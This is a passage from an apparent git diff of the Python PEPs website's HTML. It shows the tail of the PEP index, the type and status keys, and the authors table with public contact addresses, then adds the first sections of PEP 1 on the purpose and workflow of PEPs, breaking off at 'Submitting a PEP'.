SW334Simple Coroutines via SuspendIterationClark C. Evans3.0
SR335Overloadable Boolean OperatorsGregory Ewing3.3
SR336Make None CallableAndrew McClelland
IW339Design of the CPython CompilerBrett Cannon
SR340Anonymous Block StatementsGuido van Rossum
SS344Exception Chaining and Embedded TracebacksKa-Ping Yee2.5
SS345Metadata for Python Software Packages 1.2Richard Jones2.7
SW346User Defined (“with”) StatementsAlyssa Coghlan2.5
SR348Exception Reorganization for Python 3.0Brett Cannon
SR349Allow str() to return unicode stringsNeil Schemenauer2.5
IR350CodetagsMicah Elliott
SR351The freeze protocolBarry Warsaw
SS354Enumerations in PythonBen Finney2.6
SR355Path - Object oriented filesystem pathsBjörn Lindqvist2.5
SW359The “make” StatementSteven Bethard2.6
SR363Syntax For Dynamic Attribute AccessBen North
SW364Transitioning to the Py3K Standard LibraryBarry Warsaw2.6
SR365Adding the pkg_resources modulePhillip J. Eby
SS367New SuperCalvin Spealman, Tim Delaney2.6
SW369Post import hooksChristian Heimes2.6, 3.0
SR377Allow __enter__() methods to skip the statement bodyAlyssa Coghlan2.7, 3.1
SW379Adding an Assignment ExpressionJervis Whitley2.7, 3.2
SW381Mirroring infrastructure for PyPITarek Ziadé, Martin von Löwis
SR382Namespace PackagesMartin von Löwis3.2
SS386Changing the version comparison module in DistutilsTarek Ziadé
SR390Static metadata for DistutilsTarek Ziadé2.7, 3.2
SW395Qualified Names for ModulesAlyssa Coghlan3.4
IW396Module Version NumbersBarry Warsaw
PR401BDFL RetirementBarry Warsaw, Brett Cannon
SR402Simplified Package Layout and PartitioningPhillip J. Eby3.3
SW406Improved Encapsulation of Import StateAlyssa Coghlan, Greg Slodkowicz3.4
SR408Standard library __preview__ packageAlyssa Coghlan, Eli Bendersky3.3
SR410Use decimal.Decimal type for timestampsVictor Stinner3.3
IS411Provisional packages in the Python standard libraryAlyssa Coghlan, Eli Bendersky3.3
PW413Faster evolution of the Python Standard LibraryAlyssa Coghlan
SR416Add a frozendict builtin typeVictor Stinner3.3
SW422Simpler customisation of class creationAlyssa Coghlan, Daniel Urban3.5
IW426Metadata for Python Software Packages 2.0Alyssa Coghlan, Daniel Holth, Donald Stufft
SS431Time zone support improvementsLennart Regebro
SW432Restructuring the CPython startup sequenceAlyssa Coghlan, Victor Stinner, Eric Snow
SS433Easier suppression of file descriptor inheritanceVictor Stinner3.4
SR437A DSL for specifying signatures, annotations and argument convertersStefan Krah3.4
SR439Inclusion of implicit pip bootstrap in Python installationRichard Jones3.4
SR455Adding a key-transforming dictionary to collectionsAntoine Pitrou3.5
SW459Standard Metadata Extensions for Python Software PackagesAlyssa Coghlan
SW460Add binary interpolation and formattingAntoine Pitrou3.5
PW462Core development workflow automation for CPythonAlyssa Coghlan
SR463Exception-catching expressionsChris Angelico3.5
SW469Migration of dict iteration code to Python 3Alyssa Coghlan3.5
SR472Support for indexing with keyword argumentsStefano Borini, Joseph Martinot-Lagarde3.6
SR473Adding structured data to built-in exceptionsSebastian Kreft
PW474Creating forge.python.orgAlyssa Coghlan
PW481Migrate CPython to Git, Github, and PhabricatorDonald Stufft
SR490Chain exceptions at C levelVictor Stinner3.6
IR496Environment MarkersJames Polley
PR497A standard mechanism for backward compatibilityEd Schofield
SR500A protocol for delegating datetime methods to their tzinfo implementationsAlexander Belopolsky, Tim Peters
SW501General purpose template literal stringsAlyssa Coghlan, Nick Humrich3.12
IR502String Interpolation - Extended DiscussionMike G. Miller3.6
SW504Using the System RNG by defaultAlyssa Coghlan3.6
PR507Migrate CPython to Git and GitLabBarry Warsaw
SS509Add a private version to dictVictor Stinner3.6
SR510Specialize functions with guardsVictor Stinner3.6
SR511API for code transformersVictor Stinner3.6
IS513A Platform Tag for Portable Linux Built DistributionsRobert T. McGibbon, Nathaniel J. Smith
SR516Build system abstraction for pip/conda etcRobert Collins, Nathaniel J. Smith
SW521Managing global context via ‘with’ blocks in generators and coroutinesNathaniel J. Smith3.6
SR522Allow BlockingIOError in security sensitive APIsAlyssa Coghlan, Nathaniel J. Smith3.6
SW531Existence checking operatorsAlyssa Coghlan3.7
SW536Final Grammar for Literal String InterpolationPhilipp Angerer3.7
SR542Dot Notation Assignment In Function HeaderMarkus Meskanen
SW543A Unified TLS API for PythonCory Benfield, Christian Heimes3.7
SR546Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7Victor Stinner, Cory Benfield2.7
SR548More Flexible Loop ControlR David Murray3.7
SR549Instance DescriptorsLarry Hastings3.7
SW550Execution ContextYury Selivanov, Elvis Pranskevichus3.7
IW551Security transparency in the Python runtimeSteve Dower3.7
SS554Multiple Interpreters in the StdlibEric Snow3.13
SW555Context-local variables (contextvars)Koos Zevenhoven3.7
SW558Defined semantics for locals()Alyssa Coghlan3.13
SR559Built-in noop()Barry Warsaw3.7
IS571The manylinux2010 Platform TagMark Williams, Geoffrey Thomas, Thomas Kluyver
SW575Unifying function/method classesJeroen Demeyer3.8
SW576Rationalize Built-in function classesMark Shannon3.8
SW577Augmented Assignment ExpressionsAlyssa Coghlan3.8
SR580The C call protocolJeroen Demeyer3.8
SR582Python local packages directoryKushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan3.12
IW583A Concurrency Memory Model for PythonJeffrey Yasskin
IW595Improving bugs.python.orgEzio Melotti, Berker Peksag
IW598Introducing incremental feature releasesAlyssa Coghlan3.9
IS599The manylinux2014 Platform TagDustin Ingram
SR601Forbid return/break/continue breaking out of finallyDamien George, Batuhan Taskaya3.8
IR605A rolling feature release stream for CPythonSteve Dower, Alyssa Coghlan3.9
SR606Python Compatibility VersionVictor Stinner3.9
SR608Coordinated Python releaseMiro Hrončok, Victor Stinner3.9
SW611The one million limitMark Shannon
SW620Hide implementation details from the C APIVictor Stinner3.12
SS622Structural Pattern MatchingBrandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin3.10
SS631Dependency specification in pyproject.toml based on PEP 508Ofek Lev
SR633Dependency specification in pyproject.toml using an exploded TOML tableLaurie Opperman, Arun Babu Neelicattu
SR637Support for indexing with keyword argumentsStefano Borini3.10
SR640Unused variable syntaxThomas Wouters3.10
SR641Using an underscore in the version portion of Python 3.10 compatibility tagsBrett Cannon, Steve Dower, Barry Warsaw3.10
SR642Explicit Pattern Syntax for Structural Pattern MatchingAlyssa Coghlan3.10
SW645Allow writing optional types as x?Maggie Moss
SR648Extensible customizations of the interpreter at startupMario Corchero3.11
SW650Specifying Installer Requirements for Python ProjectsVikram Jayanthi, Dustin Ingram, Brett Cannon
SR651Robust Stack Overflow HandlingMark Shannon
SR662Editable installs via virtual wheelsBernát Gábor
IR663Standardizing Enum str(), repr(), and format() behaviorsEthan Furman3.11
SR665A file format to list Python dependencies for reproducibility of an applicationBrett Cannon, Pradyun Gedam, Tzu-ping Chung
SR666Reject Foolish IndentationLaura Creighton2.2
SR677Callable Type SyntaxSteven Troxler, Pradeep Kumar Srinivasan3.11
SR690Lazy ImportsGermán Méndez Bravo, Carl Meyer3.12
SW704Require virtual environments by default for package installersPradyun Gedam
SR707A simplified signature for __exit__ and __aexit__Irit Katriel3.12
SR712Adding a “converter” parameter to dataclasses.fieldJoshua Cannon3.13
SR713Callable ModulesAmethyst Reese3.12
SR722Dependency specification for single-file scriptsPaul Moore
SW724Stricter Type GuardsRich Chiodo, Eric Traut, Erik De Bonte3.13
SR726Module __setattr__ and __delattr__Sergey B Kirpichev3.13
SR754IEEE 754 Floating Point Special ValuesGregory R. Warnes2.3
SW756Add PyUnicode_Export() and PyUnicode_Import() C functionsVictor Stinner3.14
SW760No More Bare ExceptsPablo Galindo, Brett Cannon3.14
PW3001Procedure for reviewing and improving standard library modulesGeorg Brandl
SR3103A Switch/Case StatementGuido van Rossum3.0
SR3117Postfix type declarationsGeorg Brandl3.0
SR3122Delineation of the main moduleBrett Cannon
SR3125Remove Backslash ContinuationJim J. Jewett
SR3126Remove Implicit String ConcatenationJim J. Jewett, Raymond Hettinger
SR3128BList: A Faster List-like TypeDaniel Stutzbach2.6, 3.0
SR3130Access to Current Module/Class/FunctionJim J. Jewett3.0
SR3133Introducing RolesCollin Winter3.0
SR3136Labeled break and continueMatt Chisholm3.1
SR3139Cleaning out sys and the “interpreter” moduleBenjamin Peterson3.0
SR3140str(container) should call str(item), not repr(item)Oleg Broytman, Jim J. Jewett
SR3142Add a “while” clause to generator expressionsGerald Britton3.0
SW3145Asynchronous I/O For subprocess.PopenEric Pruitt, Charles R. McCreary, Josiah Carlson3.2
SW3146Merging Unladen Swallow into CPythonCollin Winter, Jeffrey Yasskin, Reid Kleckner3.3
SR3152CofunctionsGregory Ewing3.3
SS3153Asynchronous IO supportLaurens Van Houtven
IR8010The Technical Leader Governance ModelBarry Warsaw
IR8011Python Governance Model Lead by Trio of PythonistasMariatta, Barry Warsaw
IR8012The Community Governance ModelŁukasz Langa
IR8013The External Council Governance ModelSteve Dower
IR8014The Commons Governance ModelJack Jansen
IR8015Organization of the Python communityVictor Stinner
+
+
+
+

Reserved PEP Numbers

+ + + + + + + + + + + + + + + +
PEPTitleAuthors
801RESERVEDWarsaw
+
+
+

PEP Types Key

+
    +
  • IInformational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
  • +
  • PProcess: Normative PEP describing or proposing a change to a Python community process, workflow or governance
  • +
  • SStandards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem
  • +
+

More info in PEP 1.

+
+
+

PEP Status Key

+
    +
  • AAccepted: Normative proposal accepted for implementation
  • +
  • AActive: Currently valid informational guidance, or an in-use process
  • +
  • DDeferred: Inactive draft that may be taken up again at a later time
  • +
  • <No letter>Draft: Proposal under active discussion and revision
  • +
  • FFinal: Accepted and implementation complete, or no longer active
  • +
  • PProvisional: Provisionally accepted but additional feedback needed
  • +
  • RRejected: Formally declined and will not be accepted
  • +
  • SSuperseded: Replaced by another succeeding PEP
  • +
  • WWithdrawn: Removed from consideration by sponsor or authors
  • +
+

More info in PEP 1.

+
+
+

Authors/Owners

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameEmail Address
A.M. Kuchlingamk at amk.ca
Aahzaahz at pythoncraft.com
Adam Turnerpython at quite.org.uk
Adrian Garcia Badaraccoadrian at adriangb.com
Alex Gaynoralex.gaynor at gmail.com
Alex Martellialeaxit at gmail.com
Alexander Belopolskyalexander.belopolsky at gmail.com
Alexandre Vassalottialexandre at peadrop.com
Alexis Challandealexis.challande at trailofbits.com
Alice Purcellalicederyn at gmail.com
Alyssa Coghlanncoghlan at gmail.com
Amethyst Reeseamethyst at n7.gg
Ammar Askarammar at ammaraskar.com
Andre Robergeandre.roberge at gmail.com
Andrew McClellandeternalsquire at comcast.net
Andrew McNamaraandrewm at object-craft.com.au
Anthony Baxteranthony at interlink.com.au
Antoine Pitrousolipsis at pitrou.net
Armin Ronacherarmin.ronacher at active-4.com
Arun Babu Neelicattuarun.neelicattu at gmail.com
Atsuo Ishimotoishimoto at gembook.org
Barry Warsawbarry at python.org
Batuhan Taskayabatuhan at python.org
Ben Finneyben+python at benfinney.id.au
Ben Hoytbenhoyt at gmail.com
Ben Northben at redfrontdoor.org
Benjamin Petersonbenjamin at python.org
Benoit Bryonbenoit at marmelune.net
Berker Peksagberker.peksag at gmail.com
Bernát Gáborgaborjbernat at gmail.com
Björn Lindqvistbjourne at gmail.com
Brandt Bucherbrandt at python.org
Brett Cannonbrett at python.org
Brian Quinlanbrian at sweetapp.com
C.A.M. Gerlachcam.gerlach at gerlach.cam
Calvin Spealmanironfroggy at gmail.com
Cameron Simpsoncs at cskk.id.au
Carl Bankspythondev at aerojockey.com
Carl Friedrich Bolz-Tereickcfbolz at gmx.de
Carl Meyercarl at oddbird.net
Carol Willingwillingc at gmail.com
Charles R. McCreary
Charles-François Natalicf.natali at gmail.com
Chris Angelicorosuav at gmail.com
Chris Jerdonekchris.jerdonek at gmail.com
Chris McDonoughchrism at plope.com
Christian Heimeschristian at python.org
Christian R. Reiskiko at async.com.br
Christopher A. Craigpython-pep at ccraig.org
Christopher Barkerpythonchb at gmail.com
Clark C. Evanscce at clarkevans.com
Cliff Wellslogiplexsoftware at earthlink.net
Collin Wintercollinwinter at google.com
Cooper Leesme at cooperlees.com
Cory Benfieldcory at lukasa.co.uk
Damien George
Daniel F Moissetdfmoisset at gmail.com
Daniel Holthdholth at gmail.com
Daniel Stutzbachdaniel at stutzbachenterprises.com
Daniel Urbanurban.dani+py at gmail.com
Dave Coledjc at object-craft.com.au
Dave Peckdavepeck at davepeck.org
David Ascherdavida at activestate.com
David Eppsteineppstein at ics.uci.edu
David Fosterdavid at dafoster.net
David Goodgergoodger at python.org
David Hewitt1939362+davidhewitt at users.noreply.github.com
David Woodsdw-git at d-woods.co.uk
Dennis Sweeneysweeney.dennis650 at gmail.com
Dino Viehlanddinov at microsoft.com
Dirkjan Ochtmandirkjan at ochtman.nl
Domenico Andreolidomenico.andreoli at linux.com
Donald Stufftdonald at stufft.io
Donghee Nadonghee.na at python.org
Doug Hellmanndoug at doughellmann.com
Dustin Ingramdi at python.org
Ed Schofielded at pythoncharmers.com
Eddie Elizondoeduardo.elizondorueda at gmail.com
Ee Durbinee at python.org
Elana Hashmanehashman at debian.org
Eli Benderskyeliben at gmail.com
Elvis Pranskevichuselvis at edgedb.com
Emily Morehouse-Valcarcelemily at python.org
Enegeneg at discuss.python.org
Eric N. Vander Weeleericvw at gmail.com
Eric Pruitt
Eric Snowericsnowcurrently at gmail.com
Eric Trauterictr at microsoft.com
Eric V. Smitheric at trueblade.com
Erik De Bonteerikd at microsoft.com
Erik M. Bray
Erlend Egeberg Aaslanderlend at python.org
Ethan Furmanethan at stoneleaf.us
Ethan Smithethan at ethanhs.me
Ewa Jodlowskaewa at python.org
Ezio Melottiezio.melotti at gmail.com
Facundo Batistafacundo at taniquetil.com.ar
Facundo Tuescafacundo.tuesca at trailofbits.com
Filipe Laínslains at riseup.net
Franek Magieraframagie at gmail.com
Fred L. Drake, Jr.fred at fdrake.net
Frédéric B. Giacomettifred at arakne.com
Fridolín Pokornýfridolin.pokorny at gmail.com
Geoffrey Thomasgeofft at ldpreload.com
Georg Brandlgeorg at python.org
Gerald Brittongerald.britton at gmail.com
Germán Méndez Bravogerman.mb at gmail.com
Gordon McMillangmcm at hypernet.com
Graham Bleaneygbleaney at gmail.com
Grant Griffing2 at iowegian.com
Greg Slodkowiczjergosh at gmail.com
Greg Steingstein at lyra.org
Greg Wilsongvwilson at ddj.com
Gregory Ewinggreg.ewing at canterbury.ac.nz
Gregory Lielensgregory.lielens at fft.be
Gregory P. Smithgreg at krypto.org
Gregory R. Warnesgregory_r_warnes at groton.pfizer.com
Guido van Rossumguido at python.org
Holger Krekelholger at merlinux.eu
Huaiyu Zhuhzhu at users.sourceforge.net
Hugo van Kemenade
Inada Naokisongofacandy at gmail.com
Irit Katrielirit at python.org
Ivan Levkivskyilevkivskyi at gmail.com
Ivona Stojanovicstojanovic.i at hotmail.com
Jack Diederichjackdied at gmail.com
Jack Jansenjack at cwi.nl
James C. Ahlstromjim at interet.com
James Hilton-Balfegobot1234yt at gmail.com
James Polleyjp at jamezpolley.com
Jason Orendorffjason.orendorff at gmail.com
Jason Petronejp at demonseed.net
Jeff Eplerjepler at unpythonic.net
Jeffrey Yasskinjyasskin at google.com
Jelle Zijlstrajelle.zijlstra at gmail.com
Jeremy Hyltonjeremy at alum.mit.edu
Jeroen Demeyerj.demeyer at ugent.be
Jervis Whitleyjervisau at gmail.com
Jesse Nollerjnoller at gmail.com
Jim Althoffjames_althoff at i2.com
Jim Bakerjim.baker at python.org
Jim J. Jewettjimjjewett at gmail.com
Jiwon Seoseojiwon at gmail.com
Joanna Jablonski
Joe Careyjoe at python.org
John Belmontejohn at neggie.net
Jonathan Riehljriehl at spaceship.com
Joop van de Poljoop.vandepol at trailofbits.com
Joseph Jevnikjoejev at gmail.com
Joseph Martinot-Lagarde
Joshua Bambrickjbambrick at google.com
Joshua Cannonjoshdcannon at gmail.com
Joshua Landaujoshua at landau.ws
Joshua Lockjlock at vmware.com
Joshua Xujxu425 at fb.com
Josiah Carlsonjcarlson at uci.edu
Jukka Lehtosalojukka.lehtosalo at iki.fi
Julien Palardjulien at palard.fr
Just van Rossumjust at letterror.com
Justin Capposjcappos at nyu.edu
Ka-Ping Yeeping at zesty.ca
Karl Nelsonnelson85 at llnl.gov
Karolina Surmakarolina.surma at gazeta.pl
Ken Jinkenjin at python.org
Kerrick Staleymail at kerrickstaley.com
Kevin Altisaltis at semi-retired.com
Kevin D. Smithkevin.smith at themorgue.org
Konstantin Kashinkkashin at fb.com
Koos Zevenhovenk7hoven at gmail.com
Koudai Aonokoxudaxi at gmail.com
Kushal Dasmail at kushaldas.in
Larry Hastingslarry at hastings.org
Laura Creightonlac at strakt.com
Laurens Van Houtven_ at lvh.cc
Laurie Oppermanlaurie_opperman at hotmail.com
Lennart Regebroregebro at gmail.com
Lie Ryanlie.1296 at gmail.com
Lino Mastrodomenicol.mastrodomenico at gmail.com
Lisa Roachlisaroach14 at gmail.com
Lois Anne DeLonglad278 at nyu.edu
Lukas Puehringerlukas.puehringer at nyu.edu
Lysandros Nikolaoulisandrosnik at gmail.com
Maggie Mossmaggiebmoss at gmail.com
Magnus Lie Hetlandmagnus at hetland.org
Malcolm Smithsmith at chaquo.com
Marc-Andre Lemburgmal at lemburg.com
Marc-André Lemburgmal at lemburg.com
Marcel Plchgmarcel.plch at gmail.com
Mariattamariatta at python.org
Marina Mooremm9693 at nyu.edu
Mario Corcheromariocj89 at gmail.com
Mark E. Haasemehaase at gmail.com
Mark Hammondmhammond at skippinet.com.au
Mark Mendozamendoza.mark.a at gmail.com
Mark Shannonmark at hotpy.org
Mark Williamsmrw at enotuniq.org
Markus Meskanenmarkusmeskanen at gmail.com
Marta Gómez Macíascyberwitch at google.com
Martijn Faassenfaassen at infrae.com
Martin Teichmannlkb.teichmann at gmail.com
Martin von Löwismartin at v.loewis.de
Masayuki Yamamoto
Matt Chisholmmatt-python at theory.org
Matt Wozniskigodlygeek at gmail.com
Matthew Rahtzmrahtz at google.com
Matthias Klosedoko at ubuntu.com
Micah Elliottmde at tracos.org
Michael Foordmichael at python.org
Michael Hudsonmwh at python.net
Michael J. Sullivansully at msully.net
Michael Leemichael.lee.0x2a at gmail.com
Michael P. Dubnerdubnerm at mindless.com
Michael Sarahanmsarahan at gmail.com
Michel Pelletiermichel at users.sourceforge.net
Mike G. Miller
Mike Meyermwm at mired.org
Mike Verdonemike.verdone at gmail.com
Miro Hrončokmiro at hroncok.cz
Moshe Zadkamoshez at zadka.site.co.il
Nathaniel J. Smithnjs at pobox.com
Neal Norwitznnorwitz at gmail.com
Ned Deilynad at python.org
Neil Hodgsonneilh at scintilla.org
Neil Schemenauernas at arctrix.com
Nick Humrichnick at humrich.us
Ofek Levofekmeister at gmail.com
Oleg Broytmanphd at phdru.name
Oren Tiroshoren at hishome.net
Pablo Galindopablogsal at python.org
Pablo Galindo Salgadopablogsal at python.org
Patrick Maupinpmaupin at gmail.com
Paul Barrettbarrett at stsci.edu
Paul Colomietspaul at colomiets.name
Paul Everittpauleveritt at me.com
Paul F. Duboispaul at pfdubois.com
Paul Gansslepaul at ganssle.io
Paul Moorep.f.moore at gmail.com
Paul Prescodpaul at prescod.net
Peter Astrandastrand at lysator.liu.se
Peter Harrisscav at blueyonder.co.uk
Peter Moodypmoody at google.com
Peter Schneider-Kampnowonder at nowonder.de
Petr Viktorinencukou at gmail.com
Philip Housephouse512 at gmail.com
Philipp Angererphil.angerer at gmail.com
Philippe Ombredannepombredanne at nexb.com
Philippe PRADOSpython at prados.fr
Phillip J. Ebypje at telecommunity.com
Pradeep Kumar Srinivasangohanpra at gmail.com
Pradyun Gedampradyunsg at gmail.com
R David Murray
Ralf Gommersralf.gommers at gmail.com
Raymond Hettingerpython at rcn.com
Reid Klecknerrnk at mit.edu
Rich Chiodorchiodo at microsoft.com
Richard Jonesrichard at python.org
Richard Oudkerkr.m.oudkerk at googlemail.com
Robert Collinsrbtcollins at hp.com
Robert Kuskarkuska at redhat.com
Robert T. McGibbonrmcgibbo at gmail.com
Roman Suzirnd at onego.ru
Ronald Oussorenronaldoussoren at mac.com
Russell Keith-Mageerussell at keith-magee.com
Ryan Gonzalezrymg19 at gmail.com
Sam Grosscolesbury at gmail.com
Samuele Pedronipedronis at python.org
Savannah Ostrowskisavannahostrowski at gmail.com
Scott Gilbertxscottg at yahoo.com
Sean Reifschneiderjafo-pep at tummy.com
Sebastian Kreftskreft at deezer.com
Sebastián Ramíreztiangolo at gmail.com
Sergey B Kirpichevskirpichev at gmail.com
Serhiy Storchaka
Seth Michael Larsonseth at python.org
Sébastien Eustacesebastien at eustace.io
Shannon Zhuszhu at fb.com
Shantanu Jainhauntsaninja at gmail.com
Simon Crosshodgestar at gmail.com
Skip Montanaroskip at pobox.com
Stefan Behnelstefan_ml at behnel.de
Stefan Krahskrah at bytereef.org
Stefano Borini
Stefano Riverastefanor at debian.org
Stepan Koltsovyozh at mx1.ru
Stepan Sindelarstepan.sindelar at oracle.com
Stephen J. Turnbullstephen at xemacs.org
Stephen Rosensirosen0 at gmail.com
Steve Dowersteve.dower at python.org
Steven Bethardsteven.bethard at gmail.com
Steven D’Apranosteve at pearwood.info
Steven Taschukstaschuk at telusplanet.net
Steven Troxlersteven.troxler at gmail.com
Stéphane Bidoulstephane.bidoul at gmail.com
Sumana Harihareswarash at changeset.nyc
Tal Einattal at python.org
Talinviridia at gmail.com
Taneli Hukkinen
Tarek Ziadétarek at ziade.org
Terence Wayterry at wayforward.net
Terry Reedytjreedy at udel.edu
The Python core team and community
Thomas Bellmanbellman+pep-divmod at lysator.liu.se
Thomas Hellertheller at python.net
Thomas Kluyverthomas at kluyver.me.uk
Thomas Woutersthomas at python.org
Tian Gaogaogaotiantian at hotmail.com
Till Varoquauxtill at fb.com
Tim Delaneytimothy.c.delaney at gmail.com
Tim Felgentrefftim.felgentreff at oracle.com
Tim Peterstim.peters at gmail.com
Tobias Kohnkohnt at tobiaskohn.ch
Todd Rovitorovitotv at gmail.com
Tomáš Orsavatomas.n at orsava.cz
Tony Lowndstony at lownds.com
Travis Oliphantoliphant at ee.byu.edu
Trent Micktrentm at activestate.com
Trishank Karthik Kuppusamykarthik at trishank.com
Tzu-ping Chunguranusjr at gmail.com
Victor Stinnervstinner at python.org
Vikram Jayanthivikramjayanthi at google.com
Vinay Sajipvinay_sajip at red-dove.com
Vincent Silesvsiles at fb.com
Vladimir Diazvladimir.diaz at nyu.edu
W Isaac Carrollicarroll at pobox.com
Walter Dörwaldwalter at livinglogic.de
Wenzel Jakobwenzel.jakob at epfl.ch
William Woodruffwilliam at yossarian.net
Yury Selivanovyury at edgedb.com
Zac Hatfield-Doddszac at zhd.dev
Zachary Warezach at python.org
Zixuan James Lip359101898 at gmail.com
Łukasz Langalukasz at python.org
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0001/index.html b/pep-0001/index.html new file mode 100644 index 00000000000..1ee12682223 --- /dev/null +++ b/pep-0001/index.html @@ -0,0 +1,849 @@ + + + + + + + + PEP 1 – PEP Purpose and Guidelines | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 1 – PEP Purpose and Guidelines

+
+
Author:
+
Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
13-Jun-2000
+
Post-History:
+
21-Mar-2001, 29-Jul-2002, 03-May-2003, 05-May-2012, +07-Apr-2013
+
+
+
+
Table of Contents +
+
+

What is a PEP?

+

PEP stands for Python Enhancement Proposal. A PEP is a design +document providing information to the Python community, or describing +a new feature for Python or its processes or environment. The PEP +should provide a concise technical specification of the feature and a +rationale for the feature.

+

We intend PEPs to be the primary mechanisms for proposing major new +features, for collecting community input on an issue, and for +documenting the design decisions that have gone into Python. The PEP +author is responsible for building consensus within the community and +documenting dissenting opinions.

+

Because the PEPs are maintained as text files in a versioned +repository, their revision history is the historical record of the +feature proposal. This historical record is available by the normal git +commands for retrieving older revisions, and can also be browsed +on GitHub.

+
+
+

PEP Audience

+

The typical primary audience for PEPs are the core developers of the CPython +reference interpreter and their elected Steering Council, as well as developers +of other implementations of the Python language specification.

+

However, other parts of the Python community may also choose to use the process +(particularly for Informational PEPs) to document expected API conventions and +to manage complex design coordination problems that require collaboration across +multiple projects.

+
+
+

PEP Types

+

There are three kinds of PEP:

+
    +
  1. A Standards Track PEP describes a new feature or implementation +for Python. It may also describe an interoperability standard that will +be supported outside the standard library for current Python versions +before a subsequent PEP adds standard library support in a future +version.
  2. +
  3. An Informational PEP describes a Python design issue, or +provides general guidelines or information to the Python community, +but does not propose a new feature. Informational PEPs do not +necessarily represent a Python community consensus or +recommendation, so users and implementers are free to ignore +Informational PEPs or follow their advice.
  4. +
  5. A Process PEP describes a process surrounding Python, or +proposes a change to (or an event in) a process. Process PEPs are +like Standards Track PEPs but apply to areas other than the Python +language itself. They may propose an implementation, but not to +Python’s codebase; they often require community consensus; unlike +Informational PEPs, they are more than recommendations, and users +are typically not free to ignore them. Examples include +procedures, guidelines, changes to the decision-making process, and +changes to the tools or environment used in Python development. +Any meta-PEP is also considered a Process PEP.
  6. +
+
+
+

PEP Workflow

+
+

Python’s Steering Council

+

There are several references in this PEP to the “Steering Council” or “Council”. +This refers to the current members of the elected Steering Council described +in PEP 13, in their role as the final authorities on whether or not PEPs +will be accepted or rejected.

+
+
+

Python’s Core Developers

+

There are several references in this PEP to “core developers”. This refers to +the currently active Python core team members described in PEP 13.

+
+
+

Python’s BDFL

+

Previous versions of this PEP used the title “BDFL-Delegate” for PEP decision +makers. This was a historical reference to Python’s previous governance model, +where all design authority ultimately derived from Guido van Rossum, the +original creator of the Python programming language. By contrast, the Steering +Council’s design authority derives from their election by the currently active +core developers. Now, PEP-Delegate is used in place of BDFL-Delegate.

+
+
+

PEP Editors

+

The PEP editors are individuals responsible for managing the administrative +and editorial aspects of the PEP workflow (e.g. assigning PEP numbers and +changing their status). See PEP Editor Responsibilities & Workflow for +details.

+

PEP editorship is by invitation of the current editors, and they can be +contacted by mentioning @python/pep-editors on GitHub. All of the PEP +workflow can be conducted via the GitHub PEP repository issues and pull +requests.

+
+
+

Start with an idea for Python

+

The PEP process begins with a new idea for Python. It is highly +recommended that a single PEP contain a single key proposal or new +idea; the more focused the PEP, the more successful it tends to be. +Most enhancements and bug fixes don’t need a PEP and +can be submitted directly to the Python issue tracker. +The PEP editors reserve the +right to reject PEP proposals if they appear too unfocused or too +broad. If in doubt, split your PEP into several well-focused ones.

+

Each PEP must have a champion – someone who writes the PEP using the style +and format described below, shepherds the discussions in the appropriate +forums, and attempts to build community consensus around the idea. The PEP +champion (a.k.a. Author) should first attempt to ascertain whether the idea is +PEP-able. Posting to the Ideas category of the Python Discourse is usually +the best way to go about this, unless a more specialized venue is appropriate, +such as the Typing category (for static typing ideas) +or Packaging category (for packaging ideas) on the Python Discourse.

+

Vetting an idea publicly before going as far as writing a PEP is meant +to save the potential author time. Many ideas have been brought +forward for changing Python that have been rejected for various +reasons. Asking the Python community first if an idea is original +helps prevent too much time being spent on something that is +guaranteed to be rejected based on prior discussions (searching +the internet does not always do the trick). It also helps to make sure +the idea is applicable to the entire community and not just the author. +Just because an idea sounds good to the author does not +mean it will work for most people in most areas where Python is used.

+

Once the champion has asked the Python community as to whether an +idea has any chance of acceptance, a draft PEP should be presented to +the appropriate venue mentioned above. +This gives the author a chance to flesh out the draft +PEP to make properly formatted, of high quality, and to address +initial concerns about the proposal.

+
+
+

Submitting a PEP

+

